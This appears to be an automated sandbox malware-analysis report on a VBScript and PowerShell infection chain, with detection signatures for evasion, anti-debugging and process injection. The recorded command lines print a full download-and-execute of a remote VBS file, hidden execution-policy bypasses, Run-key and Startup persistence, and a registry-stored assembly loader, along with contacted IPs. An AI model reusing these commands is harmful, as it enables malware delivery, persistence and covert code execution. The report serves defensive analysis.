Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\System32\wscript.exeWindow / User API: threadDelayed 843Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5767
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 748Thread sleep time: -922337203685477s >= -60000sJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 1300Thread sleep time: -60000s >= -60000sJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 2268Thread sleep count: 843 > 30Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 2268Thread sleep time: -50580000s >= -60000sJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 2260Thread sleep time: -60000s >= -60000sJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 1404Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\wscript.exe TID: 2712Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216Thread sleep count: 5767 > 30
Source: C:\Windows\System32\wscript.exe TID: 3224Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\wscript.exe TID: 3356Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3100Thread sleep time: -922337203685477s >= -60000s
Source: C:\Windows\System32\wscript.exe TID: 3528Thread sleep time: -60000s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: wscript.exe, 0000000A.00000003.1678864821.025AB000.00000004.sdmpBinary or memory string: iRWxIQ0VuQVFJVGFXeGx1UkhLd1ZOTFZWZyINCklmIFBIeWtVanl0a1dwUEVlSXlPYU9NdEpqID0gIkVsSENFbkFRSVRhV3hsdVJIS3dWTkxWVmciIFRoZW4NCkVuZCBJZg0KRm9yIGJGTEdNTEZKRnVBcnJ5Rk5vRE1uWXp2ID0gMTU3NiB0by
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for debuggers (devices)Show sources
Source: C:\Windows\System32\mshta.exeFile opened: C:\Windows\WinSxS\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\mshta.exeSystem information queried: KernelDebuggerInformationJump to behavior
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 23.105.131.191 5478
Source: C:\Windows\System32\wscript.exeNetwork Connect: 194.5.98.10 136Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 166.62.121.61 443Jump to behavior
Allocates memory in foreign processesShow sources
Source: C:\Windows\System32\wscript.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50000 protect: page read and write
Source: C:\Windows\System32\wscript.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50000 protect: page read and write
Source: C:\Windows\System32\wscript.exeMemory allocated: unknown base: 50000 protect: page read and write
Bypasses PowerShell execution policyShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Writes to foreign memory regionsShow sources
Source: C:\Windows\System32\wscript.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50000
Source: C:\Windows\System32\wscript.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50020
Source: C:\Windows\System32\wscript.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FFD7238
Source: C:\Windows\System32\wscript.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50000
Source: C:\Windows\System32\wscript.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50020
Source: C:\Windows\System32\wscript.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FFDF238
Source: C:\Windows\System32\wscript.exeMemory written: unknown base: 50000
Source: C:\Windows\System32\wscript.exeMemory written: unknown base: 50020
Source: C:\Windows\System32\wscript.exeMemory written: unknown base: 7FFDE238
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','%temp%\microsoft.vbs'); Start '%temp%\microsoft.vbs'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs' Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exeProcess created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources